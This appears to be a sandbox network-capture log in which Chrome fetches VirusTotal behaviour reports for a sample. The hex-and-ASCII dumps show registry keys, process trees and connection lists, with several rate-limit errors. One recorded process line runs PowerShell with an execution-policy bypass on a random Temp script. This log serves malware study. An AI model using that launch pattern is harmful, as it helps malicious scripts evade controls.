                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC1408INData Raw: 6c 65 67 61 74 65 46 6f 6c 64 65 72 73 5c 5c 53 74 6f 72 61 67 65 44 65 6c 65 67 61 74 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 6f 66 74 77 61 72 65 5c 5c 43 6c 61 73 73 65 73 5c 5c 43 4c 53 49 44 5c 5c 7b 35 39 30 33 31 41 34 37 2d 33 46 37 32 2d 34 34 41 37 2d 38 39 43 35 2d 35 35 39 35 46 45 36 42 33 30 45 45 7d 5c 5c 53 68 65 6c 6c 46 6f 6c 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72
                                                                                                                                                                                                                    Data Ascii: legateFolders\\StorageDelegate", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\ShellFolder", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explor
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC1408INData Raw: 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 4e 6f 50 72 6f 70 65 72 74 69 65 73 52 65 63 79 63 6c 65 42 69 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 5c 5c 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 5c 5c 47 65 6f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65
                                                                                                                                                                                                                    Data Ascii: ARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesRecycleBin", "HKEY_CURRENT_USER\\Control Panel\\International\\Geo", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explore
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC1280INData Raw: 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 44 65 73 63 72 69 70 74 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 5c 5c 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 5c 5c 55 73 65 72 20 50 72 6f 66 69 6c 65 5c 5c 4c 61 6e 67 75 61 67 65 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 6f 66 74 77 61 72 65 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 4e 6f 6e 45 6e 75 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: A-8655-8A092E34987A}\\Description", "HKEY_CURRENT_USER\\Control Panel\\International\\User Profile\\Languages", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\NonEnum",
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC1408INData Raw: 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 53 74 72 65 61 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 35 45 36 43 38 35 38 46 2d 30 45 32 32 2d 34 37 36 30 2d 39 41 46 45 2d 45 41 33 33 31 37 42 36 37 31 37 33 7d 5c 5c 43 61 74 65 67 6f 72 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f
                                                                                                                                                                                                                    Data Ascii: ns\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\\Category", "HKEY_CURRENT_


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    253192.168.2.165001374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC562OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:36 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: b7482c73dcf10ced1f92d2d87cbed562
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:36 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:36 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    254192.168.2.165001474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:39 UTC955OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTMxOTA2MjY1MTQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTk4LjQ0NA==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 2c5793b8f7b226b102a6a4427bc30a3e
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:40 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:40 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC1408INData Raw: 6e 61 74 69 6f 6e 5f 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 72 61 6e 73 70 6f 72 74 5f 6c 61 79 65 72 5f 70 72 6f 74 6f 63 6f 6c 22 3a 20 22 54 43 50 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 69 6e 61 74 69 6f 6e 5f 69 70 22 3a 20 22 37 34 2e 31 32 35 2e 32 30 31 2e 38 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 69 6e 61 74 69 6f 6e 5f 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: nation_port": 443, "transport_layer_protocol": "TCP" }, { "destination_ip": "74.125.201.84", "destination_port": 443, "
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC544INData Raw: 22 64 65 73 74 69 6e 61 74 69 6f 6e 5f 69 70 22 3a 20 22 32 33 39 2e 32 35 35 2e 32 35 35 2e 32 35 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 69 6e 61 74 69 6f 6e 5f 70 6f 72 74 22 3a 20 31 39 30 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 72 61 6e 73 70 6f 72 74 5f 6c 61 79 65 72 5f 70 72 6f 74 6f 63 6f 6c 22 3a 20 22 55 44 50 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 69 6e 61 74 69 6f 6e 5f 69 70 22 3a 20 22 32 32 34 2e 30 2e 30 2e 32 35 31 22 2c 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "destination_ip": "239.255.255.250", "destination_port": 1900, "transport_layer_protocol": "UDP" }, { "destination_ip": "224.0.0.251",
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC1408INData Raw: 77 73 5c 5c 73 79 73 6e 61 74 69 76 65 5c 5c 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 5c 5c 76 31 2e 30 5c 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 5c 22 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 62 79 70 61 73 73 20 2d 46 69 6c 65 20 5c 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 79 79 79 6b 4f 72 6c 42 69 56 4e 64 54 66 50 47 51 57 53 4f 2e 70 73 31 5c 22 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 68 69 6c 64 72 65 6e 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: ws\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy bypass -File \"C:\\Users\\<USER>\\AppData\\Local\\Temp\\yyykOrlBiVNdTfPGQWSO.ps1\"", "children": [ {
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC1408INData Raw: 6e 6e 6f 74 61 74 69 6f 6e 3d 70 74 79 70 65 3d 63 72 61 73 68 70 61 64 2d 68 61 6e 64 6c 65 72 20 5c 22 2d 2d 64 61 74 61 62 61 73 65 3d 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 55 73 65 72 20 44 61 74 61 5c 5c 43 72 61 73 68 70 61 64 5c 22 20 2d 2d 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 32 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 72 2f 72 65 70 6f 72 74 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 63 68 61 6e 6e 65 6c 3d 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 70 6c 61 74 3d 57 69 6e 36 34 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 70 72 6f 64 3d 43 68 72 6f 6d 65 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 76 65 72 3d 31 32 32 2e
                                                                                                                                                                                                                    Data Ascii: nnotation=ptype=crashpad-handler \"--database=C:\\Users\\<USER>\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=122.
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC1280INData Raw: 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 34 30 39 2d 31 38 30 30 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 35 33 32 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61
                                                                                                                                                                                                                    Data Ascii: tions-seed-version=20240409-180046.183000 /prefetch:8" }, { "process_id": "5324", "name": "\"C:\\Progra
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC1408INData Raw: 20 22 33 30 38 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 71 75 61 72 61 6e 74 69 6e 65 2e 6d 6f 6a 6f 6d 2e 51 75 61 72 61 6e 74 69 6e 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61
                                                                                                                                                                                                                    Data Ascii: "3088", "name": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-pla
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC1408INData Raw: 39 31 33 34 39 39 36 32 33 34 32 35 35 30 35 39 2c 37 39 38 34 32 32 37 34 38 39 30 31 38 34 35 39 33 34 36 2c 32 36 32 31 34 34 20 2d 2d 76 61 72 69 61 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 34 30 39 2d 31 38 30 30 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d
                                                                                                                                                                                                                    Data Ascii: 9134996234255059,7984227489018459346,262144 --variations-seed-version=20240409-180046.183000 /prefetch:8" } ] } ] }
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC1280INData Raw: 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 33 36 30 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 77 62 65 6d 5c 5c 77 6d 69 70 72 76 73 65 2e 65 78 65 20 2d 73 65 63 75 72 65 64 20 2d 45 6d 62 65 64 64 69 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: [ { "process_id": "3604", "name": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" }
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 32 30 35 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 4c 6f 63 61 6c 53 79 73 74 65 6d 4e 65 74 77 6f 72 6b 52 65 73 74 72 69 63 74 65 64 20 2d 70 20 2d 73 20 50 63 61 53 76 63 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63
                                                                                                                                                                                                                    Data Ascii: "process_id": "2056", "name": "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc" }, { "proc


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    255192.168.2.165001574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:40 UTC562OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:41 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 49fb043b122dc200039748aa8255887f
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:41 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:41 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    256192.168.2.165001674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:44 UTC955OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
